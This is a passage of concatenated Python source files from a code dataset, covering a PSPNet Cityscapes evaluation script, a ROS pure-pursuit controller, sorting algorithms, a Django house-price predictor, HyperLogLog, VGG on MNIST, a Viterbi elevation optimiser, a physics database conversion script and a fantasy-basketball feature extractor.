== 255:\n            label_dict[l.trainId] = 0\n        else:\n            label_dict[l.trainId] = l.id\n\n    h, w = pred.shape\n    outputs = np.zeros((h, w), dtype=np.uint8)\n    for j in range(h):\n        for k in range(w):\n            outputs[j, k] = label_dict[int(pred[j, k])]\n    return outputs\n\n\ndef main(flags):\n    nn_utils.set_gpu(flags.GPU) # use the parsed flag, not the module constant\n\n    # define network\n    model = pspnet.PSPNet(flags.num_classes, flags.tile_size, batch_size=flags.batch_size)\n\n    cm_train = cityscapes_reader.CollectionMakerCityscapes(flags.data_dir, flags.rgb_type, flags.gt_type, 'train',\n                                                           flags.rgb_ext, flags.gt_ext, ['png', 'png'],\n                                                           clc_name='{}_train'.format(flags.ds_name),\n                                                           force_run=False)\n    cm_test = cityscapes_reader.CollectionMakerCityscapes(flags.data_dir, flags.rgb_type, flags.gt_type, 'val',\n                                                          flags.rgb_ext, flags.gt_ext, ['png', 'png'],\n                                                          clc_name='{}_valid'.format(flags.ds_name),\n                                                          force_run=False)\n    cm_test.print_meta_data()\n    resize_func_train = lambda img: skimage.transform.resize(img, flags.tile_size, mode='reflect')\n    resize_func_test = lambda img: skimage.transform.resize(img, cm_test.meta_data['tile_dim'], order=0,\n                                                            preserve_range=True, mode='reflect')\n\n    init_op, reader_op = dataReaderSegmentation.DataReaderSegmentation(\n        flags.tile_size, cm_test.meta_data['file_list'], batch_size=flags.batch_size, random=False,\n        chan_mean=cm_train.meta_data['chan_mean'], is_train=False, has_gt=True, gt_dim=1, include_gt=True,\n        global_func=resize_func_train).read_op()\n    estimator = nn_processor.NNEstimatorSegmentScene(\n        model, cm_test.meta_data['file_list'], flags.res_dir, init_op, reader_op, ds_name='city_scapes',\n        save_result_parent_dir='Cityscapes', gpu=flags.GPU, score_result=True, split_char='.',\n        post_func=resize_func_test, save_func=make_general_id_map, ignore_label=(-1, 255))\n    estimator.run(force_run=flags.force_run)\n\n\nif __name__ == '__main__':\n    flags = read_flag()\n    main(flags)\n","sub_path":"]tasks/2018.09.26.cityscapes/test_cityscapes_pspnet.py","file_name":"test_cityscapes_pspnet.py","file_ext":"py","file_size_in_byte":4402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"98013062","text":"#!/usr/bin/env python\n\nimport rospy\nfrom race.msg import 
drive_param\nfrom nav_msgs.msg import Odometry\nimport math\nimport numpy as np\nfrom tf.transformations import euler_from_quaternion, quaternion_from_euler\nimport csv\nimport os\nimport tf\nfrom geometry_msgs.msg import PoseStamped\nfrom visualization_msgs.msg import Marker\n\n#############\n# CONSTANTS #\n#############\nLOOKAHEAD_DISTANCE = 1.5 # meters\n\nprevious_goal = 0\n\nANGLE_LEVEL_1 = 10.0\nSPEED_LEVEL_1 = 1.5\nANGLE_LEVEL_2 = 20.0\nSPEED_LEVEL_2 = 1.0\nSPEED_LEVEL_3 = 0.5\n\n###########\n# GLOBALS #\n###########\n\n# Import waypoints.csv into a list (path_points)\ndirname = os.path.dirname(__file__)\nfilename = os.path.join(dirname, '../waypoints/wall_following_waypoints.csv')\n\nwith open(filename) as f:\n    path_points = [tuple(line) for line in csv.reader(f)]\n\n# Turn path_points into a list of floats to eliminate the need for casts in the code below.\npath_points = [(float(point[0]), float(point[1]), float(point[2])) for point in path_points]\n\n# Publisher for 'drive_parameters' (speed and steering angle)\npub = rospy.Publisher('drive_parameters', drive_param, queue_size=1)\ngoal_pub = rospy.Publisher('desired_path', PoseStamped, queue_size=1)\nmarker_pub = rospy.Publisher('lookahead', Marker, queue_size=1)\n\nrospy.init_node('pure_pursuit')\ntf_listener = tf.TransformListener() #use tf tree for pose transforms\n\n#############\n# FUNCTIONS #\n#############\n\n# Computes the Euclidean distance between two 2D points p1 and p2.\ndef dist(p1, p2):\n    return np.sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)\n\n# Input data is an Odometry message from topic /pf/pose/odom.\n# Runs pure pursuit and publishes velocity and steering angle.\n\n\ndef find_goal_point(x, y, yaw, lookahead):\n\n    dist_arr = np.zeros(len(path_points))\n    goal = previous_goal # fall back to the last goal if no candidate is found\n\n    for i in range(len(path_points)):\n        dist_arr[i] = dist((path_points[i][0], path_points[i][1]), (x, y))\n\n    goal_arr = []\n    for i in range(dist_arr.shape[0]):\n        if dist_arr[i] >= lookahead - 0.3 and dist_arr[i] <= lookahead + 0.3:\n            goal_arr.append(i)\n\n    for idx in goal_arr:\n        vector1 = [path_points[idx][0]-x, path_points[idx][1]-y]\n        vector2 = [np.cos(yaw), np.sin(yaw)]\n        if abs(find_angle(vector1, vector2)) < np.pi/2:\n            goal = idx\n            break\n\n    return goal\n\ndef transform_point(goal_point):\n    goal_pose_msg = PoseStamped()\n    goal_pose_msg.header.stamp = rospy.Time.now()\n    goal_pose_msg.header.frame_id = \"map\"\n    goal_pose_msg.pose.position.x = goal_point[0]\n    goal_pose_msg.pose.position.y = goal_point[1]\n    goal_pose_msg.pose.position.z = 0.0\n    quaternion = quaternion_from_euler(0.0, 0.0, goal_point[2])\n    goal_pose_msg.pose.orientation.x = quaternion[0]\n    goal_pose_msg.pose.orientation.y = quaternion[1]\n    goal_pose_msg.pose.orientation.z = quaternion[2]\n    goal_pose_msg.pose.orientation.w = quaternion[3]\n\n    tf_listener.waitForTransform(\"/map\", \"/base_link\", goal_pose_msg.header.stamp, rospy.Duration(0.5))\n    goal_pose = tf_listener.transformPose(\"/base_link\", goal_pose_msg)\n    # (trans,rot) = listener.lookupTransform('/map/', '/base_link/', rospy.Time(0))\n\n    return goal_pose_msg, goal_pose\n\ndef find_angle(vector1, vector2):\n    cos_comp = np.dot(vector1, vector2)\n    sin_comp = np.linalg.norm(np.cross(vector1, vector2)) # was np.cross(vector2, vector2), which is always zero\n    return np.arctan2(sin_comp, cos_comp)\n\ndef callback(msg):\n\n    x = msg.pose.pose.position.x\n    y = msg.pose.pose.position.y\n\n    qx = 
msg.pose.pose.orientation.x\n    qy = msg.pose.pose.orientation.y\n    qz = msg.pose.pose.orientation.z\n    qw = msg.pose.pose.orientation.w\n\n    pose_quaternion = np.array([qx, qy, qz, qw])\n    yaw = tf.transformations.euler_from_quaternion(pose_quaternion)[2]\n\n    # 2. Find the path point closest to the vehicle that is >= 1 lookahead distance from vehicle's current location.\n    global LOOKAHEAD_DISTANCE, previous_goal # both are reassigned below\n\n    goal = find_goal_point(x, y, yaw, LOOKAHEAD_DISTANCE)\n\n    goal_point = path_points[goal]\n    previous_goal = goal\n\n    # 3. Transform the goal point to vehicle coordinates.\n    goal_pose_msg, goal_pose = transform_point(goal_point)\n\n    # 4. Calculate the curvature = 1/r = 2x/l^2\n    # The curvature is transformed into steering wheel angle and published to the 'drive_param' topic.\n    abs_y = abs(goal_pose.pose.position.y)\n    curvature = ((2.0*abs_y)/(LOOKAHEAD_DISTANCE**2))\n    angle = np.arctan(0.3302*curvature) # 0.3302 m is the car's wheelbase\n    # angle = curvature\n\n\n    if goal_pose.pose.position.y < 0:\n        angle = -angle #Right Steering\n\n    angle = np.clip(angle, -0.4189, 0.4189) # 0.4189 radians = 24 degrees because car can only turn 24 degrees max\n    # clipping speeds and Lookahead\n    degree_angle = math.degrees(angle)\n    if abs(degree_angle) < ANGLE_LEVEL_1:\n        vel = SPEED_LEVEL_1\n        LOOKAHEAD_DISTANCE = 1.5\n    elif ANGLE_LEVEL_1 <= abs(degree_angle) < ANGLE_LEVEL_2:\n        vel = SPEED_LEVEL_2\n        LOOKAHEAD_DISTANCE = 1.0\n    else:\n        vel = SPEED_LEVEL_3\n        LOOKAHEAD_DISTANCE = 0.5\n\n    msg = drive_param()\n    msg.velocity = vel\n    msg.angle = angle\n    pub.publish(msg)\n    goal_pub.publish(goal_pose_msg)\n\n    lookahead_marker = Marker()\n    lookahead_marker.type = Marker.TEXT_VIEW_FACING\n    lookahead_marker.header.frame_id = '/map'\n    lookahead_marker.scale.z = 0.5\n    lookahead_marker.color.a = 1\n    lookahead_marker.color.r = 1.0\n    lookahead_marker.color.g = 0.0\n    lookahead_marker.color.b = 0.0\n    lookahead_marker.pose.position.x = 0.0\n    lookahead_marker.pose.position.y = 4.0\n    rospy.set_param('LOOKAHEAD_DISTANCE', LOOKAHEAD_DISTANCE)\n    multiline_str = 'LOOKAHEAD_DISTANCE: %s'%str(LOOKAHEAD_DISTANCE) + ' \\n' + 'VELOCITY: %s'%str(vel)\n\n    lookahead_marker.text = multiline_str\n    marker_pub.publish(lookahead_marker)\n\nif __name__ == '__main__':\n    rospy.Subscriber('/pf/pose/odom', Odometry, callback, queue_size=1)\n    rospy.spin()\n\n","sub_path":"final_race_lab/virtualfastkeyboardfurious_final_race/scripts/pure_pursuit.py","file_name":"pure_pursuit.py","file_ext":"py","file_size_in_byte":6139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"594469023","text":"\nimport sorting_algorithm.basic_helpers as helpers\nimport sorting_algorithm.sorting_test as data\nimport math\n\n\ndef selection_sort(alist):\n    \"\"\"\n    First, find the smallest item in the array, and exchange it with the first entry. Then, find the next smallest item\n    and exchange it with the second entry. Continue in this way until the entire array is sorted. 
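The total running time is quadratic in the number of items, regardless of the initial order of the input. 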
This method is called\n selection sort because it works by repeatedly selecting the smallest remaining item.\n :param alist:\n :return:\n \"\"\"\n\n if not alist:\n return []\n if len(alist) <= 1:\n return alist\n\n for i in range(len(alist)):\n for j in range(i+1, len(alist)):\n if not helpers.less_than(alist[i], alist[j]):\n helpers.exch(alist, i, j)\n\n return alist\n\n\ndef insertion_sort(alist):\n \"\"\"\n The algorithm that people often use to sort bridge hands is to consider the cards one at a time, inserting each\n into its proper place among those already considered (keeping them sorted). In a computer implementation,\n we need to make space for the current item by moving larger items one position to the right,\n before inserting the current item into the vacated position.\n :param alist:\n :return:\n \"\"\"\n\n if not alist:\n return []\n\n for i in range(1, len(alist)):\n for j in (range(i)):\n if helpers.less_than(alist[i], alist[j]):\n helpers.exch(alist, i, j)\n\n return alist\n\n\ndef shell_sort(alist):\n \"\"\"\n The idea is to rearrange the array to give it the property that taking every hth entry (starting anywhere) yields\n a sorted sequence. Such an array is said to be h-sorted\n\n Here, we use N / 2 for gap sequence.\n :param alist:\n :return:\n \"\"\"\n if not alist:\n return False\n\n if len(alist) <= 1:\n return True\n\n N = len(alist)\n h = math.floor(N / 2) # gap\n\n while h >= 1:\n # do h-sorting\n size = math.ceil(N / h)\n for g in range(h): # each group\n for i in range(g + h, g + h * size, h):\n if i < N:\n for j in range(g, i, h):\n if helpers.less_than_or_equal(alist[i], alist[j]):\n helpers.exch(alist, i, j)\n\n h = math.floor(h / 2)\n\n return True\n\n\n# print(data.TEST_A)\n# shell_sort(data.TEST_A)\n# print(data.TEST_A)\n\n","sub_path":"sorting_algorithm/elementory_sorting.py","file_name":"elementory_sorting.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"85592042","text":"from django.shortcuts import render\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\ndef home(request):\n return render(request,'home.html')\n\ndef predict(request):\n return render(request,'predict.html')\n\ndef result(request):\n df = pd.read_csv('C:/Users/pc lenovo/Downloads/USA_Housing.csv')\n df.drop('Address', inplace=True, axis=1)\n X = df[['Avg. Area Income', 'Avg. Area House Age', 'Avg. Area Number of Rooms',\n 'Avg. 
Area Number of Bedrooms', 'Area Population']]\n    y = df['Price']\n    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30)\n    model = LinearRegression()\n    model.fit(X_train, y_train)\n    var1 = float(request.GET['n1'])\n    var2 = float(request.GET['n2'])\n    var3 = float(request.GET['n3'])\n    var4 = float(request.GET['n4'])\n    var5 = float(request.GET['n5'])\n    pred = model.predict(np.array([var1, var2, var3, var4, var5]).reshape(1, -1))\n    pred = round(pred[0])\n    price = \"The predicted price is $\" + str(pred)\n\n    return render(request, 'predict.html', {\"result2\": price})\n","sub_path":"HousePricePrediction/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"618554422","text":"'''\nCreated on 28.12.2016\n\n@author: Timo\n'''\nimport random\n\nclass HyperLogLog:\n    def __init__(self, L):\n        self.l = L\n        self.m = 2**L\n        #values for alpha_m {16: 0.75207,32: 0.77308,64: 0.78356}\n        self.alpha = 0.78356\n        self.registers = [0] * self.m # start at 0: an untouched register contributes 2**0 = 1 to the harmonic sum\n\n    def add(self, x):\n        # x itself is ignored: a random register index plus a geometric draw simulate hashing x\n        index = random.randint(0, self.m-1)\n        lead_zeros = leading_zeros()\n        self.registers[index] = max(self.registers[index], lead_zeros)\n\n    def size(self):\n        temp = 0\n        for reg in self.registers:\n            temp = temp + 2**(-1*reg)\n        Z = temp**(-1)\n        E = self.alpha*(self.m**2)*Z\n        return E\n\ndef leading_zeros():\n    # position of the first 1-bit in a simulated random bit stream (geometric, minimum 1)\n    index = 1\n    while random.random() < 0.5:\n        index += 1\n    return index\n","sub_path":"hyperloglog.py","file_name":"hyperloglog.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"21472006","text":"from __future__ import absolute_import, division, print_function\n\nimport tensorflow as tf\n\nimport vgg\n\nTRAIN_BATCH_SIZE = 128\nNUM_CLASSES = 10\nNUM_EPOCHS = 10\nVALIDATION_SIZE = 5000\nEVAL_BATCH_SIZE = 128\n\ndef main():\n    \"\"\"Train vgg16 on mnist\n\n    Note: In order to have compatible dimensions, you must\n    comment out the first three pooling layers in Vgg\n    \"\"\"\n    mnist = tf.keras.datasets.mnist\n    (x_train, y_train), (x_test, y_test) = mnist.load_data()\n    x_train, x_test = x_train / 255.0, x_test / 255.0\n\n    # the evaluation split is carved out here but not used below\n    x_eval = x_train[:VALIDATION_SIZE, ...]\n    y_eval = y_train[:VALIDATION_SIZE]\n    x_train = x_train[VALIDATION_SIZE:, ...]\n    y_train = y_train[VALIDATION_SIZE:]\n\n    model = tf.estimator.Estimator(\n        model_fn=vgg.vgg_model_fn,\n        params={\n            \"num_classes\": NUM_CLASSES,\n            \"data_format\": \"channels_last\"\n        }\n    )\n\n    model.train(\n        input_fn=lambda: vgg.input_fn(x_train, y_train, TRAIN_BATCH_SIZE)\n    )\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"models/vgg/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"132463999","text":"#!/usr/bin/env python3\n# Viterbi Ave minimization problem\n# based on skeleton code by D. 
Crandall, March 2019\n\nimport numpy as np\n\n# problem definition\nhome_elevations = [10, 12, 15, 1, 25, 0, 1, 16, 16, 18]\nN = 10 # cost of raising/lowering a home 1 foot\nM = 1 # constant factor in cost of staircases\n\npossible_elevations = range(0, 26)\nhome_count = len(home_elevations)\n\n# left_messages[i] is the message *to* the i-th home, from the i+1-th home\n# right_messages[i] is the message to the i-th home, from the i-1-th home\nleft_messages = np.zeros((home_count, 26),)\nright_messages = np.zeros((home_count, 26),)\n\n\ndef D(my_elevation, i):\n    return N*abs(home_elevations[i]-my_elevation) ## done\n\ndef V(my_elevation, neighbor_elevation):\n    return M*(my_elevation-neighbor_elevation)*(my_elevation-neighbor_elevation) ## done\n\nfor iteration in range(0, home_count*2):\n    new_left_messages = np.zeros((home_count, 26),)\n    new_right_messages = np.zeros((home_count, 26),)\n\n    for i in range(0, home_count-1):\n        for neighbor_elevation in possible_elevations:\n            new_right_messages[i+1][neighbor_elevation] = np.min([(D(x,i)+V(x,neighbor_elevation)+right_messages[i][x]) for x in possible_elevations]) ## done\n\n    for i in range(1, home_count):\n        for neighbor_elevation in possible_elevations:\n            new_left_messages[i-1][neighbor_elevation] = np.min([(D(x,i)+V(x,neighbor_elevation)+left_messages[i][x]) for x in possible_elevations]) ## done\n\n    np.copyto(left_messages, new_left_messages)\n    np.copyto(right_messages, new_right_messages)\n\n# finally, every home chooses its best elevation based on the last set of neighbors and its own D() cost\nnew_elevations = [0] * home_count\nfor i in range(0, len(home_elevations)):\n    new_elevations[i] = np.argmin([(right_messages[i][my_elevation] + left_messages[i][my_elevation] + D(my_elevation, i)) for my_elevation in possible_elevations ] )\n\n# calculate the cost of the final answer\ncost = abs(new_elevations[0] - home_elevations[0])*N # abs, like the terms in the loop below\nfor i in range(1, len(home_elevations)):\n    cost += abs(new_elevations[i] - home_elevations[i])*N + M*(new_elevations[i] - new_elevations[i-1])**2\n\nprint(\"Problem inputs:\")\nprint(\"    Cost of raising/lowering yard: $%d/foot\" % N)\nprint(\"    Cost of staircase            : height squared x $%d\" % M)\nprint(\"    Current yard elevations      : \" + str(home_elevations))\nprint(\"\")\nprint(\"Solution:\")\nprint(\"    Min cost to install sidewalk : $%d\" % cost)\nprint(\"    New yard elevations          : \" + str(new_elevations))\n\n\n\n","sub_path":"module9_stereo_beleif_propogation/pyton.py","file_name":"pyton.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"490995770","text":"#!/usr/bin/env python3\n\n\"\"\"\n.. 
module:: convert\n :synopsis: used to create info.txt and the .txt files.\n\n\"\"\"\nimport sys\nimport os\nimport argparse\n\nargparser = argparse.ArgumentParser(description = \n'create info.txt, txname.txt, twiki.txt and sms.py')\nargparser.add_argument ('-utilsPath', '--utilsPath', \nhelp = 'path to the package smodels_utils',\\\ntype = str )\nargparser.add_argument ('-smodelsPath', '--smodelsPath', \nhelp = 'path to the package smodels_utils',\\\ntype = str )\nargs = argparser.parse_args()\n\nif args.utilsPath:\n utilsPath = args.utilsPath\nelse:\n databaseRoot = '../../../'\n sys.path.append(os.path.abspath(databaseRoot))\n from utilsPath import utilsPath\n utilsPath = databaseRoot + utilsPath\nif args.smodelsPath:\n sys.path.append(os.path.abspath(args.smodelsPath))\n\nsys.path.append(os.path.abspath(utilsPath))\nfrom smodels_utils.dataPreparation.inputObjects import MetaInfoInput,DataSetInput\nfrom smodels_utils.dataPreparation.databaseCreation import databaseCreator\nfrom smodels_utils.dataPreparation.massPlaneObjects import x, y, z\n\n#+++++++ global info block ++++++++++++++\ninfo = MetaInfoInput('ATLAS-SUSY-2016-15')\ninfo.url \t\t = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/PAPERS/SUSY-2016-15/'\ninfo.sqrts \t\t = 13\ninfo.lumi \t\t = 36.1\ninfo.prettyName = '0L stop'\ninfo.private \t = False\ninfo.arxiv \t\t = 'https://arxiv.org/abs/1709.04183'\ninfo.contact \t = 'atlas-phys-susy-conveners@cern.ch'\ninfo.publication = 'https://link.springer.com/article/10.1007/JHEP12(2017)085'\n\n#+++++++ dataset block ++++++++++++++\ndataset = DataSetInput('data')\ndataset.setInfo(dataType = 'upperLimit', dataId = None)\n\nT2tt \t\t\t\t\t\t\t= dataset.addTxName('T2tt')\nT2tt.checked \t\t\t\t\t= 'False'\nT2tt.constraint \t\t\t\t= '[[[t]],[[t]]]'\nT2tt.conditionDescription \t\t= None\nT2tt.condition \t\t\t\t\t= None\nT2tt.massConstraint\t\t\t\t= [['dm >= 169.0'], ['dm >= 169.0']]\nT2tt.source \t\t\t\t\t= 'ATLAS'\n#+++++++ next txName block ++++++++++++++\nT2ttoff \t\t\t\t\t\t= dataset.addTxName('T2ttoff')\nT2ttoff.checked \t\t\t\t= 'False'\nT2ttoff.constraint \t\t\t\t= '[[[b, W]],[[b, W]]]'\nT2ttoff.conditionDescription \t= None\nT2ttoff.condition \t\t\t\t= None\nT2ttoff.massConstraint \t\t\t= [['80 <= dm < 169.0'], ['80 <= dm < 169.0']]\nT2ttoff.source \t\t\t\t\t= 'ATLAS'\n#+++++++ next mass plane block ++++++++++++++\nT2bbffff\t\t\t\t\t\t= dataset.addTxName('T2bbffff')\nT2bbffff.checked\t\t\t\t= 'False'\nT2bbffff.constraint\t\t\t\t= \"9./4.*[[['b', 'jet','jet']],[['b', 'jet','jet']]]\"\nT2bbffff.conditionDescription \t= None\nT2bbffff.condition\t\t\t\t= None\nT2bbffff.source\t\t\t\t\t= 'ATLAS'\nT2bbffff.massConstraint\t\t\t= [['dm < 80'], ['dm < 80']]\n#+++++++ next mass plane block ++++++++++++++\nT2tt_1 \t\t\t\t\t\t\t= T2tt.addMassPlane(2*[[x, y]])\nT2tt_1.figure \t\t\t\t\t= 'figaux_12'\nT2tt_1.figureUrl \t\t\t\t= 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/PAPERS/SUSY-2016-15/figaux_12.png'\nT2tt_1.dataUrl\t\t\t\t\t= 'https://www.hepdata.net/record/ins1623207?version=7&table=X-section U.L. 
direcTT'\nT2tt_1.setSources(dataLabels\t= ['expExclusion', 'obsExclusion', 'upperLimits'],\n \tdataFiles\t= ['orig/ExpectedexclusioncontourdirectTT.csv', 'orig/ObservedexclusioncontourdirectTT.csv', 'orig/X-sectionU.L.direcTT.csv'],\n\t\t\t\t\tcoordinates = [ {x: 0, y: 1, 'value': None}, {x: 0, y: 1, 'value': None}, {x : 1, y: 0, 'value' :2} ],\n \t\tunits \t= [ None, None, 'fb' ],\n \tdataFormats\t= ['csv', 'csv', 'csv'])\n\nT2ttoff.addMassPlane(T2tt_1)\nT2bbffff.addMassPlane(T2tt_1)\n\n\n\n\ndatabaseCreator.create()\n\n\n","sub_path":"smodels-database/13TeV/ATLAS/ATLAS-SUSY-2016-15/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"260923476","text":"import numpy as np\n\nk_i = np.array([0.20, 0.22, 0.78, 0.80,\n 0.30, 0.32, 0.96, 1.00,\n 1.20, 1.43, 1.80, 1.88,\n 0.40, 0.50, 3.24, 3.50,\n 0.38, 0.43, 2.24, 4.90,\n 0.40, 0.44, 1.22, 4.00,\n 0.39, 0.44, 0.96, 1.80,\n 0.39, 0.45, 0.80, 1.60,\n 0.40, 0.47, 0.60, 1.60], dtype=float)\n\nc_i = np.linspace(0, 160, 9)\nt_i = np.array([16, 25, 50, 75], dtype=float)\n\n\ndef phi_ij(c_ii, c_j, t_ii, t_j):\n return np.sqrt(1 + (c_ii - c_j)**2 + (t_ii - t_j)**2)\n\n\ndef calculate_aj():\n b_ij = np.zeros((36, 36), dtype=float)\n\n i = 0\n for c_j_val in c_i:\n for t_j_val in t_i:\n j = 0\n for c_i_val in c_i:\n for t_i_val in t_i:\n b_ij[i, j] = phi_ij(c_i_val, c_j_val, t_i_val, t_j_val)\n j += 1\n\n i += 1\n\n a_ij = np.linalg.solve(b_ij, k_i)\n return a_ij\n\n\ndef tk_ct(a_ij, c, t):\n i = 0\n function_value = 0\n for c_j in c_i:\n for t_j in t_i:\n function_value += a_ij[i] * phi_ij(c, c_j, t, t_j)\n i += 1\n \n return function_value\n\n\ndef check():\n a_ij = calculate_aj()\n k_test = np.zeros(36, dtype=float)\n i = 0\n for c in c_i:\n for t in t_i:\n k_test[i] = tk_ct(a_ij, c, t)\n i += 1\n\n print(k_test)\n","sub_path":"infiltration.py","file_name":"infiltration.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"598455982","text":"\"\"\"\nExtracts features into drafts/features.csv\n\"\"\"\n\nfrom datetime import datetime, timedelta\n\nimport pandas as pd\n\nimport db\nfrom util import Timed, features_csv_filename\n\npd.set_option('display.expand_frame_repr', False)\n\n# players\nres = db.session.query(db.Player.id, db.Player).all()\nlocal = dict(res)\n\nGLDB = {}\n\n\ndef load_gldb_if_empty(date):\n \"\"\"\n Public function, only call this one!\n\n :param date: date to reference for GLDB\n :return:\n \"\"\"\n if len(GLDB) == 0:\n with Timed(\"loading GLDB\"):\n _load_gldb(date)\n\n\ndef _load_gldb(date):\n end = date\n gls = db.session.query(db.GameLog) \\\n .join(db.Game) \\\n .filter(db.Game.date < end) \\\n .order_by(db.Game.date.desc()) \\\n .all()\n GLDB[\"all\"] = gls\n GLDB[\"players\"] = {}\n\n # .filter(db.GameLog.zeroes == False) \\\n # n_zeroes = db.session.query(db.GameLog) \\\n # .filter(db.GameLog.zeroes == True) \\\n # .count()\n # print(\"Filtered {} game logs out for having all zeroes\".format(n_zeroes))\n\n for gl in gls:\n name = gl.player.name\n GLDB[\"players\"][name] = GLDB[\"players\"].get(name, []) + [gl]\n\n for name, gls in GLDB[\"players\"].items():\n GLDB[\"players\"][name] = sorted(gls, key=lambda gl: gl.game.date, reverse=True)\n\n _filter_players_from_gldb_with_no_game_logs_less_than_(25.0)\n print(\"GLDB has {} logs total\".format(len(GLDB[\"all\"])))\n\n\ndef 
_filter_players_from_gldb_with_no_game_logs_less_than_(cutoff):\n no_hope = []\n for name, gls in GLDB[\"players\"].items():\n good_games = [gl for gl in gls if gl.fanduel_score > cutoff]\n if len(good_games) == 0:\n no_hope.append(name)\n\n for name in no_hope:\n del GLDB[\"players\"][name]\n\n start = len(GLDB[\"all\"])\n GLDB[\"all\"] = [gl for gl in GLDB[\"all\"] if gl.player.name not in no_hope]\n end = len(GLDB[\"all\"])\n\n df = pd.DataFrame([name for name in no_hope], index=range(len(no_hope)), columns=[\"Name\"]) \\\n .sort_values(by=\"Name\")\n\n print(\"REMOVED {} logs from the following players for having never played a good game: \\n{}\"\n .format(start - end, df))\n\n\n# TODO\n# 1. Team_Avg_PTS\n# 2. Opp_Avg_PTS\n\nFEATURES = [\n # \"player_id\",\n # \"team_id\",\n # \"opponent_team_id\",\n\n # \"opponent_let_ppg\",\n # \"home_game\",\n # \"vegas_total\",\n # \"opponent_fppg\",\n\n \"trailing_1_FPPG\",\n \"trailing_1_MIN\",\n \"trailing_1_PTS\",\n \"trailing_1_REB\",\n \"trailing_1_AST\",\n \"trailing_1_BLK\",\n \"trailing_1_STL\",\n \"trailing_1_TO\",\n \"trailing_3_FPPG\",\n \"trailing_3_MIN\",\n \"trailing_3_PTS\",\n \"trailing_3_REB\",\n \"trailing_3_AST\",\n \"trailing_3_BLK\",\n \"trailing_3_STL\",\n \"trailing_3_TO\",\n \"trailing_5_FPPG\",\n \"trailing_5_MIN\",\n \"trailing_5_PTS\",\n \"trailing_5_REB\",\n \"trailing_5_AST\",\n \"trailing_5_BLK\",\n \"trailing_5_STL\",\n \"trailing_5_TO\",\n \"avg_FPPG\",\n \"avg_MIN\",\n \"avg_PTS\",\n \"avg_REB\",\n \"avg_AST\",\n \"avg_BLK\",\n \"avg_STL\",\n \"avg_TO\",\n]\n\n\nTEAMS={}\n\ndef get_opponent_ppg(opp):\n if opp.alias not in TEAMS:\n points_given_up_at_home = sum([g.away_team_score for g in opp.home_games])\n points_given_up_away = sum([g.home_team_score for g in opp.away_games])\n TEAMS[opp.alias] = (points_given_up_at_home + points_given_up_away) / float(len(opp.home_games) + len(opp.away_games))\n return TEAMS[opp.alias]\n\n\ndef df_row(pid, game_day, gl=None, game_str=None):\n player = local[pid]\n\n all_game_logs = GLDB[\"players\"][player.name]\n\n if type(game_day) == datetime:\n game_day = game_day.date() # TODO this sucks, figure out something better\n if game_day > all_game_logs[0].game.date:\n start = 0\n else:\n start = next(i for i in range(len(all_game_logs)) if all_game_logs[i].game.date == game_day)\n start += 1 # don't include the gl for today, not supposed to have happened yet =]\n history = all_game_logs[start:]\n max = 10000\n\n if gl is None:\n glid = None\n fp = None\n opp_team = None\n\n # away, home = game_str.split(\"@\")\n # if player.team.alias == home:\n # home_game = True\n # opp_alias = away\n # else:\n # home_game = False\n # opp_alias = home\n # opp_team = db.session.query(db.Team) \\\n # .filter(db.Team.alias == opp_alias) \\\n # .one()\n else:\n glid = gl.id\n fp = gl.fanduel_score\n\n if player.team.id == gl.game.home_team.id:\n home_game = True\n opp_team = gl.game.away_team\n else:\n home_game = False\n opp_team = gl.game.home_team\n\n # previous_games = [gl for gl in history if gl.game.away_team == opp_team or gl.game.home_team == opp_team]\n # if len(previous_games) > 0:\n # previous_fppg = average_stat(previous_games, \"fanduel_score\", max, check_length=False)\n # previous_fppg *= len(previous_games)\n # # print(\"has previous games\")\n # else:\n # if len(history) > 0:\n # previous_fppg = average_stat(history, \"fanduel_score\", max, check_length=False)\n # previous_fppg = 0\n # else:\n # previous_fppg = None\n\n try:\n return pd.Series({\n \"glid\": glid,\n \"pid\": pid,\n 
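# glid/pid/draft_date/name are bookkeeping columns and FP is the target; only FEATURES above feed the model\n            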
